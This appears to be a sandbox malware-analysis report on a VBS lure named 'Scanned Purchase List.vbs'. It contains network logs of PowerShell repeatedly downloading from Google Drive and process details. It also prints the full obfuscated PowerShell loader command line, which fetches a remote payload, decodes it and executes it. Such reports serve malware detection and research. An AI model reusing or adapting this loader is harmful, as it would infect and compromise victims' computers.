                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID:21
                Source IP:192.168.2.4
                Source Port:49764
                Destination IP:142.250.185.142
                Destination Port:443
                PID:7444
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp:2024-10-01 05:47:21 UTC
                Bytes transferred:121
                Direction:OUT
                Data:
                GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                Timestamp:2024-10-01 05:47:21 UTC
                Bytes transferred:1319
                Direction:IN
                Data:
                HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:21 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-q78IHXj6e7CS5p1mDtT2dQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID:22
                Source IP:192.168.2.4
                Source Port:49765
                Destination IP:142.250.185.142
                Destination Port:443
                PID:7444
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp:2024-10-01 05:47:26 UTC
                Bytes transferred:121
                Direction:OUT
                Data:
                GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                Timestamp:2024-10-01 05:47:26 UTC
                Bytes transferred:1319
                Direction:IN
                Data:
                HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:26 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'report-sample' 'nonce-qyOMG572OKK9p7Oi0qK4bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID:23
                Source IP:192.168.2.4
                Source Port:49766
                Destination IP:142.250.185.142
                Destination Port:443
                PID:7444
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp:2024-10-01 05:47:32 UTC
                Bytes transferred:121
                Direction:OUT
                Data:
                GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                Timestamp:2024-10-01 05:47:32 UTC
                Bytes transferred:1319
                Direction:IN
                Data:
                HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:32 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-IqVkXtVctL9fH0RIby20Bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID:24
                Source IP:192.168.2.4
                Source Port:49767
                Destination IP:142.250.185.142
                Destination Port:443
                PID:7444
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp:2024-10-01 05:47:37 UTC
                Bytes transferred:121
                Direction:OUT
                Data:
                GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                Timestamp:2024-10-01 05:47:37 UTC
                Bytes transferred:1319
                Direction:IN
                Data:
                HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:37 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Content-Security-Policy: script-src 'report-sample' 'nonce-g9BJC--5qyrzrDuLzJ-vSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID:25
                Source IP:192.168.2.4
                Source Port:49768
                Destination IP:142.250.185.142
                Destination Port:443
                PID:7444
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp:2024-10-01 05:47:42 UTC
                Bytes transferred:121
                Direction:OUT
                Data:
                GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                Timestamp:2024-10-01 05:47:43 UTC
                Bytes transferred:1319
                Direction:IN
                Data:
                HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:47:42 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-STaQi4Tp1l2-pgMQZlo0OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Target ID:0
                Start time:01:45:34
                Start date:01/10/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
                Imagebase:0x7ff79a000000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:1
                Start time:01:45:36
                Start date:01/10/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . 
VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA asD.t) su ';$Billaanets=$counterargues;tramelling (doublecrossing ' or$BilGBomLEneoB tbslaaBorlThr:r taPolP InoBo.CKa rIndiFugs riiTemA RaRElsY.al=Bar(T lTsquemars stT.ar-H.aP DraRabTRekHUns Ve $FisbOphIfreLM.nL saa LoAProNslaEsuktValsUni) h ');while (!$Apocrisiary) {tramelling (doublecrossing 'But$kurgAn,lLabo eb omaUnplHay:Rare tuuRovpQuah,oro P r BebKopiUndaMsslMaa=End$PretskorT auAc e ca ') ;tramelling $semicolloquially;tramelling (doublecrossing 'Ejesne tAn a inrHeatCol-BrassamlUnde epeNatpDag Ove4Des ');tramelling (doublecrossing 'Hil$ Img flsk oConbmisaDenlFra:MasA edpEnaoEkscPr,rBesiYo.sCrei Coa Vgr LuyA t=sun(K lTIngeAngsF,etGen- F.PProajawt M,hUrt Uni$sa Bskai VelDefls aaD pa O n oeMu.tG as wh)ste ') ;tramelling (doublecrossing ' W.$ m g KolUddoArab onaAu l re: spEs unNa.est rsikg.isieftmI fnDdsg HjdstueN n=Ord$ TygCollNaroTrubLeuaGullLyd:FalTP,oiTypdA bsA phFo.o scr U,i ResBisoGran.omt Wase b+ Di+fo %Dre$EnhsOmvtAs,yOpdr astEpidDy,yFl.kLyckFale efrUnd..emcManospruFusnDyrtsk, ') ;$Encheson=$styrtdykker[$Energimngde];}$Arthriticine=282118;$sorteringsordenen=30262;tramelling (doublecrossing 'Pl.$WabgCenlslaoLeubFraa jal t : g.Osi.mBets 
ortGloy U.rProtPseeHyptEpi slv=Bai st G Alesutt.xa-sacC PtoPosnP ntHa.eLu.n cetC.e Br$ .tBen,i amlPral leaBliasarnOldeMontEkss Di ');tramelling (doublecrossing 'sty$salg Auls po ekb abaph lOpe:,arsso.t pioBard CodGene ajrFlikVano PrnspigE ee phnU d Ext=E e mi.[Mi sTepyFlysOlitTaveKipm.ol. emCspyosannFunv HaeAmpr CotOm ]B,g:Beg:VouFD,nr.etoUnwmscrBsc aKapsLuneUpp6Pis4 Hos TwtIntrCh iAfgnraagTer(Kam$EmpOB.omAmbssket piyJu r,ret R eApptAld) sl ');tramelling (doublecrossing 'Fi $,mmgjo l skoPosb O.asunl i:by,NKo,o C tD ma.xmrsc iBoazKomisarnRefgB.a Ma=Euc Unc[ HasD nyTemsBettBiseFlamM k.RomTI seDisxambtBlo.WigEOs nDigcBabo Pad PliAfsnTimgTik],kr:De : slAFars ReCUnuIsamI.ta. H,G .reEsttConsCymtU ora,visa nHoggInf(ye $Fr s ngt A,oBledAardRe e MorInskVagoF,dnMicgAlleCatnall) Re ');tramelling (doublecrossing 'Mya$ eg ypl,kooU sb.oua.hol gn:TreC,ighsweuLancCsuk ,oyse.=Lio$Mi NPasoO.ltBloa C ra si DizAfkiNo n.argskr.AmpsNymu U,b sksGr tTv,rDiviseenmaagFor(T.e$,arA FurstytIndhBelrTiliNontGenis.lc nistyn,tiePha,bin$ ous,eaoKonr T,tMeleKokrHo iLinnEntgTilsshaoBarr MadKroe Ben AceNo n T ) ka ');tramelling $Chucky;"
                Imagebase:0x7ff788560000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:2
                Start time:01:45:36
                Start date:01/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                  Memory Dump Source
                  • Source File: 00000001.00000002.3015046778.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fa552a4bae80145d0ccf13562531830574b965e12a52b7af6243e7c0fc6d5a3
                  • Instruction ID: 40a17bd1f2cf03c554d884909a3ba9eb9b02f1f64ade9c625970a7d23421298d
                  • Opcode Fuzzy Hash: 2fa552a4bae80145d0ccf13562531830574b965e12a52b7af6243e7c0fc6d5a3
                  • Instruction Fuzzy Hash: 6CF1C330A18A4D8FDF98EF5CC8A5EA977E1FF69300F15016AD449D7296CA75EC41CB80
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 567757185da8e40f4094093cf194ec2bdc5c96150c6ade1b65ca054d489e99c2
                  • Instruction ID: 137232d11ada13b2dfb79c6df4664d3d624693051ab6d1cea208070e189982d8
                  • Opcode Fuzzy Hash: 567757185da8e40f4094093cf194ec2bdc5c96150c6ade1b65ca054d489e99c2
                  • Instruction Fuzzy Hash: 5EC13822B0FA8E0FE7A99768586557937D1EFC2350B0A02BEE45EC71F3DE58AD018341
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 286f9460c10d74783703513774cba5f0bbb653c34d6c6bd9303917a4d1f47a2c
                  • Instruction ID: ec68e6a846414bf40f25bcd0a49f430c26aa3d7aba21d3573359fbc44891dc9a
                  • Opcode Fuzzy Hash: 286f9460c10d74783703513774cba5f0bbb653c34d6c6bd9303917a4d1f47a2c
                  • Instruction Fuzzy Hash: 8C212622F0FA8E0FE3B9A76854B517566C2EFD2250B5A01BEE45DC32F3ED59AC058301
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcaad8c49f45e48d9fd0c86c398487c215e26b91c6f0253bb0f648b85456ed1c
                  • Instruction ID: e3ea2dcd612b9359c1a8bf95b664ad4f09875496098b621d73b21528e7f62737
                  • Opcode Fuzzy Hash: dcaad8c49f45e48d9fd0c86c398487c215e26b91c6f0253bb0f648b85456ed1c
                  • Instruction Fuzzy Hash: 42213052B0FAC90FE761A76818692A86BD1DFA6650B1940FFC09CCB1F3DC481C0A8302
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d751f49ccb9a2b8acb5174ecd18b17398cd9b182ff27c72d7c1f3b784aff7048
                  • Instruction ID: 615b303c4bbbbaa05ad55d43a3f62763639203203f4a7efe962ef68f0c48c620
                  • Opcode Fuzzy Hash: d751f49ccb9a2b8acb5174ecd18b17398cd9b182ff27c72d7c1f3b784aff7048
                  • Instruction Fuzzy Hash: DE01F922F0E6C90FEB69EB9C50605A8BBD2EF99310F4401BEE48DD7093D9545D008350
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015046778.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                  • Instruction ID: c20e5037b83526d5eba0af566b53653c9fee128c971c83e7493f47a61ebd04fb
                  • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                  • Instruction Fuzzy Hash: A801843020CB0C4FD748EF0CE051AA5B3E0FB95324F10056EE58AC36A5DA22E882CB41
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015383948.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9bad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18397aec6e3f5d815dae4027e98da09332de3eccf2af6b4d60db815d8c538be3
                  • Instruction ID: dbed43c6979711c3e7889f96e90e3a641db667ba98501d58d25167dea6c3be27
                  • Opcode Fuzzy Hash: 18397aec6e3f5d815dae4027e98da09332de3eccf2af6b4d60db815d8c538be3
                  • Instruction Fuzzy Hash: C9F0B432F0E6880FEB55EBA854655E8BBA1EB59354F0401BFD09CD2193E82518418760
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.3015046778.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: +f[$I$OE^I$^
                  • API String ID: 0-54979186
                  • Opcode ID: 430638dcd7adb77868906c438a980d7bf150a644358977d60defe4b414f852c5
                  • Instruction ID: 95f998be264722fa46941b39ce111e72b6bda05d09b4114ba89203bc8c532063
                  • Opcode Fuzzy Hash: 430638dcd7adb77868906c438a980d7bf150a644358977d60defe4b414f852c5
                  • Instruction Fuzzy Hash: 41819F63B0F7D64BF7224B6858760B53F70FF53125B0A42FBC4D58A0F39D4529068261